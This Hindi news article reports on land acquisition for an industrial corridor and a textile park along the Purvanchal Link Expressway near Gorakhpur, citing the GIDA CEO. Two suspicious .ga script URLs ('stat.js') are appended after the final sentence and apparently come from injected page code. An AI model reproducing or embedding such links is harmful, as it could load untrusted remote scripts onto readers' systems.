पूर्वांचल लिंक एक्सप्रेस-वे के किनारे औद्योगिक गलियारा बनाने की प्रक्रिया तेज हो गई है। प्रथम चरण में 1200 एकड़ जमीन के लिए प्रस्ताव तैयार कर लिया गया है। गुरुवार का प्रस्ताव उत्तर प्रदेश एक्सप्रेस वे औद्योगिक विकास प्राधिकरण (यूपीडा) के सीईओ को भेज दिया गया। कैबिनेट से पास होने के बाद इसकी अधिसूचना जारी हो जाएगी। अधिसूचना के बाद अधिग्रहण शुरू हो जाएगा।

पूर्वांचल लिंक एक्सप्रेस वे के दोनों ओर औद्योगिक गलियारा विकसित करने की तैयारी है। पहले चरण में सहजनवां तहसील के तालनवर एवं भगवानपुर तथा सदर तहसील के बाघागाड़ा में गांव की जमीन अधिग्रहीत की जाएगी। सीईओ गीडा संजीव रंजन की देखरेख में कई दिनों में यह प्रस्ताव तैयार किया गया है। इन्हीं तीन गांवों में 1200 एकड़ जमीन मिल जा रही है। अधिग्रहण के बाद यहां बड़ी औद्योगिक इकाइयों को भूखंड उपलब्ध कराए जाएंगे। दूसरे चरण में और गांवों में अधिग्रहण किया जाएगा।

जमीन मिल जाने के बाद औद्योगिक गलियारे का काम भी तेज हो जाएगा। यहां औद्योगिक इकाइयों की स्थापना से बड़े पैमाने पर लोगों के लिए रोजगार का द्वार खुल सकेगा। जिससे क्षेत्र का विकास भी होगा। औद्योगिक गलियारे के लिए जमीन अधिग्रहण करने के लिए प्रस्ताव यूपीडा के सीईओ को भेज दिया गया है। शासन से नोटिफिकेशन जारी होने के बाद जमीन की खरीद शुरू हो जाएगी। – संजीव रंजन, सीईओ गीडा

औद्योगिक गलियारे में टेक्सटाइल पार्क बनाने की भी तैयारी है। वाराणसी के बाद अब गोरखपुर का नाम भी टेक्सटाइल पार्क की सूची में शामिल कर लिया गया है। करीब 100 एकड़ जमीन पर विकसित किए जाने वाले पार्क में कई इकाइयां स्थापित हो सकेंगी। इसके लिए स्पेशल परपज व्हीकल का गठन किया जाएगा।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.